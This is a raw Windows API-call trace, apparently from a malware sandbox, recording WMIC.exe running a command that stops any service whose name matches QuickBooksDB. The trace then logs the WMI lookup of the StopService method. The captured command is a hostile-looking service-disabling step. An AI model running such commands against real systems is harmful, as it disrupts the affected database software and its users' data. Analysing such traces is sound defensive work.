value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0302.837] malloc (_Size=0xc) returned 0x2f2aba0 [0302.837] malloc (_Size=0xc) returned 0x2f2ac90 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] SysStringLen (param_1="TABLE") returned 0x5 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0302.837] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.837] SysStringLen (param_1="wmiclimofformat") returned 0xf [0302.837] malloc (_Size=0x18) returned 0x2f22c48 [0302.837] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.837] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.837] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.837] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=19, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.838] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="textvaluelist.xsl") returned 0x0 [0302.838] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.838] malloc (_Size=0xc) returned 0x2f2acd8 [0302.838] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.838] free (_Block=0x2f2acd8) [0302.838] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0302.838] malloc (_Size=0xc) returned 0x2f2ad50 [0302.838] malloc (_Size=0xc) returned 0x2f2ab40 [0302.838] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.838] SysStringLen (param_1="TABLE") returned 0x5 [0302.838] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.838] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.838] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.838] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.838] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.838] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.838] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.838] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.838] malloc (_Size=0x18) returned 0x2f22c68 [0302.838] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.838] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.839] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.839] IXMLDOMNodeList:get_item (in: This=0x2ee9ca0, index=20, listItem=0x97f8e4 | out: listItem=0x97f8e4*=0x2ee6b88) returned 0x0 [0302.839] IXMLDOMNode:get_text (in: This=0x2ee6b88, text=0x97f8e8 | out: text=0x97f8e8*="textvaluelist.xsl") returned 0x0 [0302.839] IXMLDOMNode:get_attributes (in: This=0x2ee6b88, attributeMap=0x97f8e0 | out: attributeMap=0x97f8e0*=0x2ee9fa8) returned 0x0 [0302.839] malloc (_Size=0xc) returned 0x2f2abe8 [0302.839] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x2ee9fa8, name="KEYWORD", namedItem=0x97f8dc | out: namedItem=0x97f8dc*=0x2ee9ff8) returned 0x0 [0302.839] free (_Block=0x2f2abe8) [0302.839] IXMLDOMNode:get_nodeValue (in: This=0x2ee9ff8, value=0x97f89c | out: value=0x97f89c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0302.839] malloc (_Size=0xc) returned 0x2f2ade0 [0302.839] malloc (_Size=0xc) returned 0x2f2ab58 [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] SysStringLen (param_1="TABLE") returned 0x5 [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0302.839] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0302.839] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0302.839] malloc (_Size=0x18) returned 0x2f22ae8 [0302.840] IUnknown:Release (This=0x2ee6b88) returned 0x0 [0302.840] IUnknown:Release (This=0x2ee9fa8) returned 0x0 [0302.840] IUnknown:Release (This=0x2ee9ff8) returned 0x0 [0302.840] IUnknown:Release (This=0x2ee9ca0) returned 0x0 [0302.840] FreeThreadedDOMDocument:IUnknown:Release (This=0x2ee6b48) returned 0x1 [0302.840] FreeThreadedDOMDocument:IUnknown:Release (This=0x2ee45a8) returned 0x0 [0302.840] free (_Block=0x2f297f0) [0302.840] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice" [0302.840] malloc (_Size=0xe0) returned 0x2f2aee8 [0302.840] memcpy_s (in: _Destination=0x2f2aee8, _DestinationSize=0xde, _Source=0x2f51b78, _SourceSize=0xd8 | out: _Destination=0x2f2aee8) returned 0x0 [0302.840] malloc (_Size=0xc) returned 0x2f2abb8 [0302.840] malloc (_Size=0xc) returned 0x2f2ac18 [0302.840] malloc (_Size=0xc) returned 0x2f2ad98 [0302.840] malloc (_Size=0xc) returned 0x2f2abe8 [0302.840] malloc (_Size=0x80) returned 0x2f2afd0 [0302.840] GetLocalTime (in: lpSystemTime=0x97f880 | out: lpSystemTime=0x97f880*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x8, wMilliseconds=0x37d)) [0302.841] _vsnwprintf (in: _Buffer=0x2f2afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x97f860 | out: _Buffer="04-02-2020T08:29:08") returned 19 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] malloc (_Size=0x94) returned 0x2f2b058 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] malloc (_Size=0x94) returned 0x2f2b0f8 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] malloc (_Size=0xa) returned 0x2f2ac00 [0302.841] lstrlenW (lpString="path") returned 4 [0302.841] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0302.841] malloc (_Size=0xa) returned 0x2f2ad68 [0302.841] malloc (_Size=0x4) returned 0x2f22ed8 [0302.841] free (_Block=0x0) [0302.841] free (_Block=0x2f2ac00) [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] malloc (_Size=0x1c) returned 0x2f29da8 [0302.841] lstrlenW (lpString="Win32_Service") returned 13 [0302.841] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0302.841] malloc (_Size=0x1c) returned 0x2f2b198 [0302.841] malloc (_Size=0x8) returned 0x2f22ee8 [0302.841] memmove_s (in: _Destination=0x2f22ee8, _DestinationSize=0x4, _Source=0x2f22ed8, _SourceSize=0x4 | out: _Destination=0x2f22ee8) returned 0x0 [0302.841] free (_Block=0x2f22ed8) [0302.841] free (_Block=0x0) [0302.841] free (_Block=0x2f29da8) [0302.841] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.841] malloc (_Size=0xc) returned 0x2f2ac48 [0302.841] lstrlenW (lpString="where") returned 5 [0302.841] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0302.841] malloc (_Size=0xc) returned 0x2f2adb0 [0302.841] malloc (_Size=0xc) returned 0x2f2ac00 [0302.841] memmove_s (in: _Destination=0x2f2ac00, _DestinationSize=0x8, _Source=0x2f22ee8, _SourceSize=0x8 | out: _Destination=0x2f2ac00) returned 0x0 [0302.841] free (_Block=0x2f22ee8) [0302.842] free (_Block=0x0) [0302.842] free (_Block=0x2f2ac48) [0302.842] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.842] malloc (_Size=0x3e) returned 0x2f2b1c0 [0302.842] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0302.842] _wcsicmp (_String1="\"name like '%%QuickBooksDB%%'\"", _String2="\"NULL\"") returned -20 [0302.842] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0302.842] lstrlenW (lpString="\"name like '%%QuickBooksDB%%'\"") returned 30 [0302.842] malloc (_Size=0x3e) returned 0x2f2b208 [0302.842] malloc (_Size=0x10) returned 0x2f2ac30 [0302.842] memmove_s (in: _Destination=0x2f2ac30, _DestinationSize=0xc, _Source=0x2f2ac00, _SourceSize=0xc | out: _Destination=0x2f2ac30) returned 0x0 [0302.842] free (_Block=0x2f2ac00) [0302.842] free (_Block=0x0) [0302.842] free (_Block=0x2f2b1c0) [0302.842] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.842] malloc (_Size=0xa) returned 0x2f2ac00 [0302.842] lstrlenW (lpString="call") returned 4 [0302.842] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0302.842] malloc (_Size=0xa) returned 0x2f2ac48 [0302.842] malloc (_Size=0x18) returned 0x2f22ca8 [0302.842] memmove_s (in: _Destination=0x2f22ca8, _DestinationSize=0x10, _Source=0x2f2ac30, _SourceSize=0x10 | out: _Destination=0x2f22ca8) returned 0x0 [0302.842] free (_Block=0x2f2ac30) [0302.842] free (_Block=0x0) [0302.842] free (_Block=0x2f2ac00) [0302.842] lstrlenW (lpString=" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice") returned 73 [0302.842] malloc (_Size=0x18) returned 0x2f22c88 [0302.842] lstrlenW (lpString="stopservice") returned 11 [0302.842] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0302.842] malloc (_Size=0x18) returned 0x2f22cc8 [0302.842] free (_Block=0x0) [0302.842] free (_Block=0x2f22c88) [0302.842] malloc (_Size=0x18) returned 0x2f22da8 [0302.842] lstrlenW (lpString="QUIT") returned 4 [0302.842] lstrlenW (lpString="path") returned 4 [0302.842] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0302.843] lstrlenW (lpString="EXIT") returned 4 [0302.843] lstrlenW (lpString="path") returned 4 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0302.843] free (_Block=0x2f22da8) [0302.843] WbemLocator:IUnknown:AddRef (This=0x2f648a0) returned 0x2 [0302.843] malloc (_Size=0x18) returned 0x2f22da8 [0302.843] lstrlenW (lpString="/") returned 1 [0302.843] lstrlenW (lpString="path") returned 4 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0302.843] lstrlenW (lpString="-") returned 1 [0302.843] lstrlenW (lpString="path") returned 4 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0302.843] lstrlenW (lpString="CLASS") returned 5 [0302.843] lstrlenW (lpString="path") returned 4 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0302.843] lstrlenW (lpString="PATH") returned 4 [0302.843] lstrlenW (lpString="path") returned 4 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0302.843] lstrlenW (lpString="/") returned 1 [0302.843] lstrlenW (lpString="Win32_Service") returned 13 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0302.843] lstrlenW (lpString="-") returned 1 [0302.843] lstrlenW (lpString="Win32_Service") returned 13 [0302.843] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0302.843] lstrlenW (lpString="Win32_Service") returned 13 [0302.843] malloc (_Size=0x1c) returned 0x2f29da8 [0302.843] lstrlenW (lpString="Win32_Service") returned 13 [0302.844] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xe9b88581 | out: _String="Win32_Service", _Context=0xe9b88581) returned="Win32_Service" [0302.844] lstrlenW (lpString="Win32_Service") returned 13 [0302.844] malloc (_Size=0x1c) returned 0x2f2b1c0 [0302.844] lstrlenW (lpString="Win32_Service") returned 13 [0302.844] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xe9b88581 | out: _String=0x0, _Context=0xe9b88581) returned 0x0 [0302.844] lstrlenW (lpString="") returned 0 [0302.844] lstrlenW (lpString="WHERE") returned 5 [0302.844] lstrlenW (lpString="where") returned 5 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0302.844] lstrlenW (lpString="/") returned 1 [0302.844] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QuickBooksDB%%'", cchCount1=28, lpString2="/", cchCount2=1) returned 3 [0302.844] lstrlenW (lpString="-") returned 1 [0302.844] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%QuickBooksDB%%'", cchCount1=28, lpString2="-", cchCount2=1) returned 3 [0302.844] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0302.844] malloc (_Size=0x3a) returned 0x2f2b250 [0302.844] lstrlenW (lpString="name like '%%QuickBooksDB%%'") returned 28 [0302.844] lstrlenW (lpString="/") returned 1 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0302.844] lstrlenW (lpString="-") returned 1 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] malloc (_Size=0xa) returned 0x2f2ac00 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] lstrlenW (lpString="GET") returned 3 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0302.844] lstrlenW (lpString="LIST") returned 4 [0302.844] lstrlenW (lpString="call") returned 4 [0302.844] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0302.845] lstrlenW (lpString="SET") returned 3 [0302.845] lstrlenW (lpString="call") returned 4 [0302.845] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0302.845] lstrlenW (lpString="CREATE") returned 6 [0302.845] lstrlenW (lpString="call") returned 4 [0302.845] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0302.845] lstrlenW (lpString="CALL") returned 4 [0302.845] lstrlenW (lpString="call") returned 4 [0302.845] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0302.845] lstrlenW (lpString="/") returned 1 [0302.845] lstrlenW (lpString="stopservice") returned 11 [0302.845] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0302.845] lstrlenW (lpString="-") returned 1 [0302.845] lstrlenW (lpString="stopservice") returned 11 [0302.845] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0302.845] lstrlenW (lpString="stopservice") returned 11 [0302.845] malloc (_Size=0x18) returned 0x2f229e8 [0302.845] lstrlenW (lpString="stopservice") returned 11 [0302.845] ??0CHString@@QAE@XZ () returned 0x97d744 [0302.845] GetCurrentThreadId () returned 0xfac [0302.845] GetCurrentThreadId () returned 0xfac [0302.845] ??0CHString@@QAE@XZ () returned 0x97d6cc [0302.845] malloc (_Size=0x4) returned 0x2f2b1e8 [0302.845] malloc (_Size=0xc) returned 0x2f2ac30 [0302.845] malloc (_Size=0xc) returned 0x2f2ac78 [0302.845] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f648a0, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2f6b1d0) returned 0x0 [0303.157] free (_Block=0x2f2ac78) [0303.157] CoSetProxyBlanket (pProxy=0x2f6b1d0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0303.158] free (_Block=0x2f2b1e8) [0303.158] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0303.158] free (_Block=0x2f2ac30) [0303.158] malloc (_Size=0xc) returned 0x2f2aca8 [0303.158] IWbemServices:GetObject (in: This=0x2f6b1d0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x97d75c*=0x0, ppCallResult=0x0 | out: ppObject=0x97d75c*=0x2fc0a90, ppCallResult=0x0) returned 0x0 [0303.256] free (_Block=0x2f2aca8) [0303.256] IWbemClassObject:BeginMethodEnumeration (This=0x2fc0a90, lEnumFlags=0) returned 0x0 [0303.256] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="StartService", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2fc0c88) returned 0x0 [0303.256] lstrlenW (lpString="StartService") returned 12 [0303.256] lstrlenW (lpString="stopservice") returned 11 [0303.256] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0303.256] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.256] IWbemClassObject:NextMethod (in: This=0x2fc0a90, lFlags=0, pstrName=0x97d768*=0x0, ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x0 | out: pstrName=0x97d768*="StopService", ppInSignature=0x97d764*=0x0, ppOutSignature=0x97d760*=0x2fc0c88) returned 0x0 [0303.256] lstrlenW (lpString="StopService") returned 11 [0303.256] lstrlenW (lpString="stopservice") returned 11 [0303.256] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0303.256] malloc (_Size=0x38) returned 0x2f2ba08 [0303.257] ??0CHString@@QAE@XZ () returned 0x97d2ac [0303.257] GetCurrentThreadId () returned 0xfac [0303.257] IWbemClassObject:GetNames (in: This=0x2fc0c88, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x97d2bc | out: pNames=0x97d2bc*="\x01ƀ\x04") returned 0x0 [0303.257] SafeArrayGetLBound (in: psa=0x2fc10a0, nDim=0x1, plLbound=0x97d2a8 | out: plLbound=0x97d2a8) returned 0x0 [0303.257] SafeArrayGetUBound (in: psa=0x2fc10a0, nDim=0x1, plUbound=0x97d2a4 | out: plUbound=0x97d2a4) returned 0x0 [0303.257] SafeArrayGetElement (in: psa=0x2fc10a0, rgIndices=0x97d2b0, pv=0x97d2c0 | out: pv=0x97d2c0) returned 0x0 [0303.257] malloc (_Size=0x24) returned 0x2f2ba48 [0303.258] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2fc0c88, wszProperty="ReturnValue", ppQualSet=0x97d1d0 | out: ppQualSet=0x97d1d0*=0x2f6add0) returned 0x0 [0303.258] malloc (_Size=0xc) returned 0x2f2ac30 [0303.258] IWbemQualifierSet:Get (in: This=0x2f6add0, wszName="CIMTYPE", lFlags=0, pVal=0x97d1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0303.258] free (_Block=0x2f2ac30) [0303.258] malloc (_Size=0xc) returned 0x2f2ac30 [0303.259] IWbemClassObject:Get (in: This=0x2fc0c88, wszName="ReturnValue", lFlags=0, pVal=0x97d178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x97d1b4*=9949596, plFlavor=0x0 | out: pVal=0x97d178*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x97d1b4*=19, plFlavor=0x0) returned 0x0 [0303.259] malloc (_Size=0xc) returned 0x2f2ad38 [0303.259] IWbemQualifierSet:Get (in: This=0x2f6add0, wszName="read", lFlags=0, pVal=0x97d1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0303.259] free (_Block=0x2f2ad38) [0303.259] malloc (_Size=0xc) returned 0x2f2ac78 [0303.259] IWbemQualifierSet:Get (in: This=0x2f6add0, wszName="write", lFlags=0, pVal=0x97d1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0303.259] free (_Block=0x2f2ac78) [0303.259] malloc (_Size=0xc) returned 0x2f2ad80 [0303.259] malloc (_Size=0xc) returned 0x2f2acd8 [0303.259] IWbemQualifierSet:Get (in: This=0x2f6add0, wszName="Description", lFlags=0, pVal=0x97d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d190*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0303.259] free (_Block=0x2f2acd8) [0303.260] malloc (_Size=0xc) returned 0x2f2acc0 [0303.260] lstrlenA (lpString="Not Available") returned 13 [0303.260] malloc (_Size=0x1c) returned 0x2f2ba78 [0303.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x2f2ba78, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0303.260] free (_Block=0x2f2ba78) [0303.260] IUnknown:Release (This=0x2f6add0) returned 0x0 [0303.260] malloc (_Size=0x24) returned 0x2f2ba78 [0303.260] malloc (_Size=0xc) returned 0x2f2ac78 [0303.260] malloc (_Size=0x24) returned 0x2f2baa8 [0303.260] malloc (_Size=0x38) returned 0x2f2bad8 [0303.260] malloc (_Size=0x24) returned 0x2f2bb18 [0303.260] free (_Block=0x2f2baa8) [0303.260] free (_Block=0x2f2ba78) [0303.260] free (_Block=0x2f2ba48) [0303.260] free (_Block=0x2f2ad80) [0303.260] free (_Block=0x2f2acc0) [0303.260] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0303.261] IWbemClassObject:GetMethodQualifierSet (in: This=0x2fc0a90, wszMethod="StopService", ppQualSet=0x97d6c4 | out: ppQualSet=0x97d6c4*=0x2f956a0) returned 0x0 [0303.261] malloc (_Size=0xc) returned 0x2f2aca8 [0303.261] IWbemQualifierSet:Get (in: This=0x2f956a0, wszName="Implemented", lFlags=0, pVal=0x97d6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d6ac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0303.261] free (_Block=0x2f2aca8) [0303.261] malloc (_Size=0xc) returned 0x2f2aca8 [0303.261] malloc (_Size=0xc) returned 0x2f2acc0 [0303.261] IWbemQualifierSet:Get (in: This=0x2f956a0, wszName="Description", lFlags=0, pVal=0x97d69c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x97d69c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0303.262] free (_Block=0x2f2acc0) [0303.262] malloc (_Size=0xc) returned 0x2f2acd8 [0303.262] IUnknown:Release (This=0x2f956a0) returned 0x0 [0303.262] malloc (_Size=0x38) returned 0x2f2ba48 [0303.262] malloc (_Size=0x38) returned 0x2f2ba88 [0303.262] malloc (_Size=0x24) returned 0x2f2bb48 [0303.262] malloc (_Size=0xc) returned 0x2f2acc0 [0303.262] malloc (_Size=0x38) returned 0x2f2bb78 [0303.262] malloc (_Size=0x38) returned 0x2f2bbb8 [0303.262] malloc (_Size=0x24) returned 0x2f2bbf8 [0303.262] malloc (_Size=0x28) returned 0x2f2bc28 [0303.262] malloc (_Size=0x38) returned 0x2f2bc58 [0303.262] malloc (_Size=0x38) returned 0x2f2bc98 [0303.263] malloc (_Size=0x24) returned 0x2f2bcd8 [0303.263] free (_Block=0x2f2bbf8) [0303.263] free (_Block=0x2f2bbb8) [0303.263] free (_Block=0x2f2bb78) [0303.263] free (_Block=0x2f2bb48) [0303.263] free (_Block=0x2f2ba88) [0303.263] free (_Block=0x2f2ba48) [0303.263] IUnknown:Release (This=0x2fc0c88) returned 0x0 [0303.263] free (_Block=0x2f2bb18) [0303.263] free (_Block=0x2f2bad8) 